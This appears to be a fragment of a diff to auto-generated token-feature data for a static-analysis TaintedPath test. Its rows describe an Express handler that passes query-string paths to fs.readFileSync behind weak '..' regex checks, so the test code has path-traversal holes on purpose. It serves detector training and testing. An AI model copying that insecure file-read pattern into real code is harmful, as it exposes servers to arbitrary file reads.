autogenerated/TaintedPath/normalizedPaths.js:392:8:392:25 | exceptional return of path.match(/\\.\\./) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:392:8:392:25 | exceptional return of path.match(/\\.\\./) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:392:8:392:25 | exceptional return of path.match(/\\.\\./) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:392:8:392:25 | path.match(/\\.\\./) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:392:8:392:25 | path.match(/\\.\\./) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:392:8:392:25 | path.match(/\\.\\./) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:392:8:392:25 | path.match(/\\.\\./) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:392:8:392:25 | path.match(/\\.\\./) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:392:13:392:17 | match | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:392:13:392:17 | match | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:392:13:392:17 | match | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:392:13:392:17 | match | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:392:13:392:17 | match | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:392:19:392:24 | /\\.\\./ | CalleeFlexibleAccessPath | path.match | | autogenerated/TaintedPath/normalizedPaths.js:392:19:392:24 | /\\.\\./ | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:392:19:392:24 | /\\.\\./ | calleeImports | path | @@ -9714,6 +79543,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:392:19:392:24 | /\\.\\./ | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:392:19:392:24 | /\\.\\./ | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:392:19:392:24 | /\\.\\./ | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:393:5:393:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:393:5:393:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:393:5:393:6 | fs | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:393:5:393:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:393:5:393:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:393:5:393:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:393:5:393:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:393:5:393:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:393:5:393:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:393:5:393:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:393:5:393:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:393:5:393:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:393:5:393:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:393:5:393:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:393:5:393:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:393:5:393:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:393:5:393:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:393:5:393:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:393:5:393:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:393:5:393:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:393:8:393:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:393:8:393:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:393:8:393:19 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:393:8:393:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:393:8:393:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:393:21:393:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:393:21:393:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:393:21:393:24 | path | calleeImports | fs | @@ -9723,6 +79577,36 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:393:21:393:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:393:21:393:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:393:21:393:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:395:7:395:27 | !path.m ... .\\.\\//) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:395:7:395:27 | !path.m ... .\\.\\//) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:395:7:395:27 | !path.m ... .\\.\\//) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:395:7:395:27 | !path.m ... .\\.\\//) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:395:7:395:27 | !path.m ... .\\.\\//) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:395:8:395:11 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:395:8:395:11 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:395:8:395:11 | path | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:395:8:395:11 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:395:8:395:11 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:395:8:395:17 | path.match | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:395:8:395:17 | path.match | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:395:8:395:17 | path.match | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:395:8:395:17 | path.match | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:395:8:395:17 | path.match | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:395:8:395:27 | exceptional return of path.match(/\\.\\.\\//) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:395:8:395:27 | exceptional return of path.match(/\\.\\.\\//) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:395:8:395:27 | exceptional return of path.match(/\\.\\.\\//) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:395:8:395:27 | exceptional return of path.match(/\\.\\.\\//) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:395:8:395:27 | exceptional return of path.match(/\\.\\.\\//) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:395:8:395:27 | path.match(/\\.\\.\\//) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:395:8:395:27 | path.match(/\\.\\.\\//) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:395:8:395:27 | path.match(/\\.\\.\\//) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:395:8:395:27 | path.match(/\\.\\.\\//) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:395:8:395:27 | path.match(/\\.\\.\\//) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:395:13:395:17 | match | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:395:13:395:17 | match | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:395:13:395:17 | match | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:395:13:395:17 | match | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:395:13:395:17 | match | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:395:19:395:26 | /\\.\\.\\// | CalleeFlexibleAccessPath | path.match | | autogenerated/TaintedPath/normalizedPaths.js:395:19:395:26 | /\\.\\.\\// | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:395:19:395:26 | /\\.\\.\\// | calleeImports | path | @@ -9732,6 +79616,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:395:19:395:26 | /\\.\\.\\// | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:395:19:395:26 | /\\.\\.\\// | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:395:19:395:26 | /\\.\\.\\// | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:396:5:396:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:396:5:396:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:396:5:396:6 | fs | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:396:5:396:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:396:5:396:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:396:5:396:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:396:5:396:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:396:5:396:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:396:5:396:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:396:5:396:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:396:5:396:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:396:5:396:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:396:5:396:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:396:5:396:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:396:5:396:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:396:5:396:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:396:5:396:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:396:5:396:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:396:5:396:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:396:5:396:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:396:8:396:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:396:8:396:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:396:8:396:19 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:396:8:396:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:396:8:396:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:396:21:396:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:396:21:396:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:396:21:396:24 | path | calleeImports | fs | @@ -9741,6 +79650,36 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:396:21:396:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:396:21:396:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:396:21:396:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:398:7:398:30 | !path.m ... \\/foo/) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:398:7:398:30 | !path.m ... \\/foo/) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:398:7:398:30 | !path.m ... \\/foo/) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:398:7:398:30 | !path.m ... \\/foo/) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:398:7:398:30 | !path.m ... \\/foo/) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:398:8:398:11 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:398:8:398:11 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:398:8:398:11 | path | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:398:8:398:11 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:398:8:398:11 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:398:8:398:17 | path.match | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:398:8:398:17 | path.match | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:398:8:398:17 | path.match | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:398:8:398:17 | path.match | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:398:8:398:17 | path.match | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:398:8:398:30 | exceptional return of path.ma ... \\/foo/) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:398:8:398:30 | exceptional return of path.ma ... \\/foo/) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:398:8:398:30 | exceptional return of path.ma ... \\/foo/) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:398:8:398:30 | exceptional return of path.ma ... \\/foo/) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:398:8:398:30 | exceptional return of path.ma ... \\/foo/) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:398:8:398:30 | path.ma ... \\/foo/) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:398:8:398:30 | path.ma ... \\/foo/) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:398:8:398:30 | path.ma ... \\/foo/) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:398:8:398:30 | path.ma ... \\/foo/) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:398:8:398:30 | path.ma ... \\/foo/) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:398:13:398:17 | match | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:398:13:398:17 | match | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:398:13:398:17 | match | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:398:13:398:17 | match | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:398:13:398:17 | match | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:398:19:398:29 | /\\.\\.\\/foo/ | CalleeFlexibleAccessPath | path.match | | autogenerated/TaintedPath/normalizedPaths.js:398:19:398:29 | /\\.\\.\\/foo/ | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:398:19:398:29 | /\\.\\.\\/foo/ | calleeImports | path | @@ -9750,6 +79689,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:398:19:398:29 | /\\.\\.\\/foo/ | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:398:19:398:29 | /\\.\\.\\/foo/ | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:398:19:398:29 | /\\.\\.\\/foo/ | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:399:5:399:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:399:5:399:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:399:5:399:6 | fs | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:399:5:399:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:399:5:399:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:399:5:399:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:399:5:399:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:399:5:399:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:399:5:399:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:399:5:399:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:399:5:399:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:399:5:399:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:399:5:399:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:399:5:399:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:399:5:399:25 | exceptional return of fs.read ... c(path) | fileImports | 